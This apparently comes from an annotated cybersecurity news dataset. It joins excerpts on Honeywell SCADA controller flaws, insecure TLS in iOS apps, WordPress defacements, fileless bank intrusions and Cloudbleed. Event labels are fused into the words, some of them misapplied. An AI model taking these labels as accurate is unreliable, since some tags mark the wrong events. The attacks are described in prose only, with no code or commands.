a popular web-based SCADA system made by Honeywell that make it easy to expose passwords and in turn , give attackers a foothold into the vulnerable network . The flaws exist inVulnerability-related.DiscoverVulnerabilitysome versions of Honeywell ’ s XL Web II controllers , systems deployed across the critical infrastructure sector , including wastewater , energy , and manufacturing companies . An advisory from the Department of Homeland Security ’ s Industrial Control Systems Cyber Emergency Response Team ( ICS-CERT ) warned aboutVulnerability-related.DiscoverVulnerabilitythe vulnerabilities Thursday . The company has developed a fix , version 3.04.05.05 , to addressVulnerability-related.PatchVulnerabilitythe issues but users have to call their local Honeywell Building Solutions branch to receiveVulnerability-related.PatchVulnerabilitythe update , according to the company . The controllers suffer from five vulnerabilities in total but the scariest one might be the fact that passwords for the controllers are stored in clear text . Furthermore , if attackers wanted to , they could discloseAttack.Databreachthat password simply by accessing a particular URL . An attacker could also carry out a path traversal attack by accessing a specific URL , open and change some parameters by accessing a particular URL , or establish a new user session . The problem with starting a new user session is that the controllers didn ’ t invalidate any existing session identifier , something that could have made it easier for an attacker to steal any active authenticated sessions . Maxim Rupp , an independent security researcher based in Germany , dug upVulnerability-related.DiscoverVulnerabilitythe bugs and teased them on Twitter at the beginning of January . Rupp has identifiedVulnerability-related.DiscoverVulnerabilitybugs in Honeywell equipment before . Two years ago he discoveredVulnerability-related.DiscoverVulnerabilitya pair of vulnerabilities in Tuxedo Touch , a home automation controller made by the company , that could have let an attacker unlock a house ’ s doors or modify its climate controls . It ’ s unclear how widespread the usage of Honeywell ’ s XL Web II controllers is . While Honeywell is a US-based company , according to ICS-CERT ’ s advisory the majority of the affected products are used in Europe and the Middle East . When reached on Friday , a spokesperson for Honeywell confirmed that the affected controllers are used in Europe and the Middle East . The company also stressed that the vulnerabilities were patchedVulnerability-related.PatchVulnerabilityin September 2016 after they were reportedVulnerability-related.DiscoverVulnerabilityin August .
Will Strafach , CEO of Sudo Security Group , saidVulnerability-related.DiscoverVulnerabilityhe foundVulnerability-related.DiscoverVulnerability76 iOS apps that are vulnerableVulnerability-related.DiscoverVulnerabilityto an attack that can intercept protected data . TLS is used to secure an app ’ s communication over an internet connection . Without it , a hacker can essentially eavesdrop over a network to spy on whatever data the app sends , such as login information . “ This sort of attack can be conducted by any party within Wi-Fi range of your device while it is in use , ” Strafach said . “ This can be anywhere in public , or even within your home if an attacker can get within close range ” . Strafach discoveredVulnerability-related.DiscoverVulnerabilitythe vulnerability in the 76 apps by scanning them with his company-developed security service , verify.ly , which he 's promoting . It flagged “ hundreds of applications ” with a high likelihood of data interception . He ’ s so far confirmedVulnerability-related.DiscoverVulnerabilitythat these 76 apps possess the vulnerability . He did so by running them on an iPhone running iOS 10 and using a proxy to insert an invalid TLS certificate into the connection . Strafach declaredVulnerability-related.DiscoverVulnerabilitythat 43 of the apps were either a high or medium risk , because they risked exposing login information and authentication tokens . Some of them are from “ banks , medical providers , and other developers of sensitive applications , ” he said . He 's not disclosingVulnerability-related.DiscoverVulnerabilitytheir names , to give them time to patchVulnerability-related.PatchVulnerabilitythe problem . The remaining 33 apps were deemed low risks because they revealed only partially sensitive data , such as email addresses . They include the free messaging service ooVoo , video uploaders to Snapchat and lesser-known music streaming services , among many others . In all , the 76 apps have 18 million downloads , according to app market tracker Apptopia , Strafach said . It ’ ll be up to the app developers to fixVulnerability-related.PatchVulnerabilitythe problem , but it only involves changing a few lines of code , says Strafach , who ’ s been trying to contact the developers . He included some warnings for developers in the blog post . “ Be extremely careful when inserting network-related code and changing application behaviors , ” he wrote . “ Many issues like this arise from an application developer not fully understanding the code they ’ ve borrowed from the web ” . Users of affected apps can protect themselves by turning off the Wi-Fi when in a public location , Strafach says . That will force the phone to use a cellular connection to the internet , making it much harder for any hacker to eavesdrop unless they use expensive and illegal equipment , Strafach said
Sucuri , the company that discoveredVulnerability-related.DiscoverVulnerabilitythe flaw and responsibly reportedVulnerability-related.DiscoverVulnerabilityit to the WordPress security team , spotted four distinct defacement campaigns in the 48 hours after the existence of the bug was publicly revealedVulnerability-related.DiscoverVulnerability. Three of them have had limited impact , but one – “ signed ” by someone that goes by “ w4l3XzY3 ” – has resulted in the compromise of 86,000 pages and counting . Sucuri CTO Daniel Cid expects the defacement campaigns to slow down in the coming days , only to be followed by SEO spam ( Search Engine Poisoning ) attempts . “ There ’ s already a few exploit attempts that try to add spam images and content to a post . Due to the monetization possibilities , this will likely be the # 1 route to abuse this vulnerability , ” he noted .
Kaspersky Lab researchers have brought to light a series of attacks leveraged against 140+ banks and other businesses around the world . But what makes these attacks unusual is the criminals ’ use of widely used legitimate tools and fileless malware , which explains why the attacks went largely unnoticed . “ This threat was originally discoveredVulnerability-related.DiscoverVulnerabilityby a bank ’ s security team , after detectingVulnerability-related.DiscoverVulnerabilityMeterpreter code inside the physical memory of a domain controller ( DC ) , ” the researchers explainedVulnerability-related.DiscoverVulnerability. “ Kaspersky Lab participated in the forensic analysis after this attack was detected , discoveringVulnerability-related.DiscoverVulnerabilitythe use of PowerShell scripts within the Windows registry . Additionally it was discoveredVulnerability-related.DiscoverVulnerabilitythat the NETSH utility as used for tunnelling traffic from the victim ’ s host to the attacker´s C2 ” . Meterpreter is a well known Metasploit payload that allows attackers to control the screen of a device using VNC and to browse , upload and download files . NETSH ( network shell ) , is a Windows command-line utility that allows local or remote configuration of network devices . The attackers also took advantage of the Windows SC utility to install a malicious service to execute PowerShell scripts , and Mimikatz to extract credentials from compromised machines .
While working on something completely unrelated , Google security researcher , Tavis Ormandy , recently discoveredVulnerability-related.DiscoverVulnerabilitythat Cloudflare was leakingAttack.Databreacha wide range of sensitive information , which could have included everything from cookies and tokens , to credentials . Cloudflare moved quickly to fixVulnerability-related.PatchVulnerabilitythings , but their postmortem downplays the risk to customers , Ormandy said . The problem on Cloudflare 's side , which impactedVulnerability-related.DiscoverVulnerabilitybig brands like Uber , Fitbit , 1Password , and OKCupid , was a memory leak . The flaw resulted in the exposure of `` HTTP cookies , authentication tokens , HTTP POST bodies , and other sensitive data , '' Cloudflare said . About an hour after being alertedVulnerability-related.DiscoverVulnerabilityby Ormandy , Cloudflare disabled three features on its platform ; email obfuscation , Server-side Excludes and Automatic HTTPS Rewrites , as they were using the broken HTML parser chain determined to be the cause of the problem .
Bad as Cloudbleed is , there ’ s no evidence attackers exploitedVulnerability-related.DiscoverVulnerabilityit before the patch was deployedVulnerability-related.PatchVulnerability. But since the vulnerability was triggered more than 1.2m times from 6,500 sites , Cloudflare is taking no chances : the company has tapped an outside company , Veracode , to scour its code . CEO Matthew Prince pledged the external review as he set out a detailed update after 12 days of investigation . That update includes a synopsis of how the vulnerability was created and who faced the most risk . He said Cloudflare continues to work with Google and others to eliminate all leaked data from memory : We ’ ve successfully removed more than 80,000 unique cached pages . That underestimates the total number because we ’ ve requested search engines purge and re-crawl entire sites in some instances . Cloudbleed is a serious vulnerability in Cloudflare ’ s internet infrastructure that Google Project Zero researcher Tavis Ormandy discoveredVulnerability-related.DiscoverVulnerabilityin mid-February . It turned out that a single character in Cloudflare ’ s code caused the problem . In its initial blog post on the matter , Cloudflare said the issue stemmed from its decision to use a new HTML parser called cf-html . In his update , Prince said Cloudbleed was triggered when a page with two characteristics was requested through Cloudflare ’ s network